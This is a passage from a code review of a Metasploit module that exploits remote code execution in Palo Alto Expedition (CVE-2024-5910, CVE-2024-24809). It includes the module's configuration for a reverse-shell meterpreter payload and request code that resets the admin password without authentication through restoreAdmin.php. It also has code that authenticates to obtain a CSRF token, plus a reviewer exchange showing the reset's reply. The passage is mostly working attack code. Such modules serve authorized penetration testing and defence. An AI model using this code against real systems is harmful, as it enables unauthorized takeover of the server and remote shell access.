modules/exploits/linux/http/paloalto_expedition_rce.rb

```diff
@@ -0,0 +1,279 @@
+          [ 'URL', 'https://security.paloaltonetworks.com/PAN-SA-2024-0010'],
+          [ 'URL', 'https://security.paloaltonetworks.com/CVE-2024-5910'],
+          [ 'CVE', '2024-5910'],
+          [ 'CVE', '2024-24809']
+        ],
+        'DisclosureDate' => '2024-10-09',
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => 'True',
+          'FETCH_FILENAME' => Rex::Text.rand_text_alpha(1..3),
+          'FETCH_WRITABLE_DIR' => '/tmp'
+        },
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Linux Command',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => [ 'linux' ],
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+              'Type' => :unix_cmd
+            }
+          ]
+        ],
+
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'Username for authentication, if available']),
+        OptString.new('PASSWORD', [false, 'Password for the specified user']),
+        OptString.new('TARGETURI', [ true, 'The URI for the Expedition web interface', '/'])
+      ]
+    )
+  end
+
+  def xsrf_token_value
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bin/Auth.php'),
+      'keep_cookies' => true,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'get',
+        'type' => 'login_users',
+        'user' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    data = res.get_json_document
+
+    fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['csrfToken']
+
+    print_good('Successfully authenticated')
+
+    csrftoken = data['csrfToken']
+    fail_with(Failure::UnexpectedReply, 'csrftoken not found.') unless csrftoken
+    vprint_status("csrftoken: #{csrftoken}")
+    csrftoken
+  end
+
+  def check
+    unless datastore['USERNAME'] && datastore['PASSWORD']
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
+      )
+
+      unless res
+        fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+      end
+
+      if res.code == 403
+        return CheckCode::Safe
+      end
+
+      fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.to_s.include?('Admin password restored to')
+
+      respass = res.to_s.match(/'([^']+)'/)[1]
```

Comment:
What value are you trying to match here? It would be nice to provide an example as a comment.

Reply:
The response looks like this:
```
✓	Connected successfully to the database
✓	Admin user found
✓	Admin password restored to:    'paloalto'
```

I've added an example as a comment. I wasn't sure if `paloalto` is the default password throughout all versions, so I'm retrieving it dynamically.